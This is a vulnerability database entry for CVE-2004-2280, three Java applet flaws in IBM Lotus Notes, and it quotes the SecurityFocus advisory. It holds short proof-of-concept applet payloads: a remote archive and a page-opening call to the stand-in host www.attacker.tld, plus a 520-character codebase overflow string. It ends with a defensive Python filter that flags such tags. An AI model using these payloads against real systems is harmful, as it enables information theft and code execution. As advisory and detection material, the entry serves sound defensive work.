IBM Lotus Notes Multiple Unspecified Security Vulnerabilities

Vulnerability ID: 1108042
Vulnerability type: Unknown
Published: 2004-07-13
Updated: 2005-10-20
CVE ID: CVE-2004-2280
CNNVD-ID: CNNVD-200412-993
Platform: Unix
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/24275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-993
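|Vulnerability details
Lotus Domino/Notes server is a web-based collaborative application architecture that runs on Linux/Unix and Microsoft Windows operating system platforms. IBM Lotus Notes has three unspecified vulnerabilities that remote attackers can exploit to compromise Lotus Notes. No detailed vulnerability information is currently available.
|Exploit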
source: http://www.securityfocus.com/bid/10704/info

IBM Lotus Notes is affected by three vulnerabilities concerning Java applets.

An attacker can exploit these issues to disclose potentially sensitive information, cause a web browser to open an arbitrary web page, and cause a stack-based buffer overflow that may be exploited to execute arbitrary code.

IBM has confirmed these vulnerabilities and has stated that they are currently under investigation. IBM problem reports for these vulnerabilities are KSPR5YS6GR, KSPR62F4D3, and KSPR62F4KN. 

<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>

Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}

Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>
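
An added example, not part of the original advisory or IBM's code: a Python check that a mail or web content filter could run to flag `<applet>` tags shaped like the samples above (a local `file:` codebase combined with a remote archive, or an oversized codebase value). The 256-character limit, the finding labels and the sample hostnames are assumptions made for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed cut-off for this example (the page's overflow sample is 520+ chars).
MAX_CODEBASE_LEN = 256
REMOTE_SCHEMES = {"http", "https", "ftp"}

def _scheme(value):
    try:
        return urlparse(value.strip()).scheme.lower()
    except ValueError:  # unparsable value, e.g. unbalanced "[" in the host
        return ""

class AppletAuditor(HTMLParser):
    """Records (line, reasons) for <applet> tags shaped like the page's samples."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":
            return
        a = {name: (value or "") for name, value in attrs}
        codebase = a.get("codebase", "")
        reasons = []
        if len(codebase) > MAX_CODEBASE_LEN:
            reasons.append("oversized-codebase")
        if _scheme(codebase) == "file":
            reasons.append("local-codebase")
            archives = a.get("archive", "").split(",")
            if any(_scheme(item) in REMOTE_SCHEMES for item in archives):
                reasons.append("local-codebase-remote-archive")
        if reasons:
            self.findings.append((self.getpos()[0], reasons))

def audit_html(html):
    auditor = AppletAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample input; hostnames are placeholders.
SAMPLE = "\n".join([
    '<applet codebase="file:///" archive="http://host.example/a.jar"></applet>',
    '<applet codebase="A:' + "A" * 520 + '" code="java.applet.Applet"></applet>',
    '<applet codebase="http://intranet.example/applets/" code="Clock.class"></applet>',
])

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```
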
|References

Source: OSVDB
Name: 8418
Link: http://www.osvdb.org/8418
Source: www-1.ibm.com
Link: http://www-1.ibm.com/support/docview.wss?rs=475&context=SSKTWP&q1=Java&uid=swg21173910&loc=en_US&cs=utf-8&lang=en
Source: SECUNIA
Name: 12046
Link: http://secunia.com/advisories/12046
Source: BID
Name: 10704
Link: http://www.securityfocus.com/bid/10704
Source: NSFOCUS
Name: 6700
Link: http://www.nsfocus.net/vulndb/6700
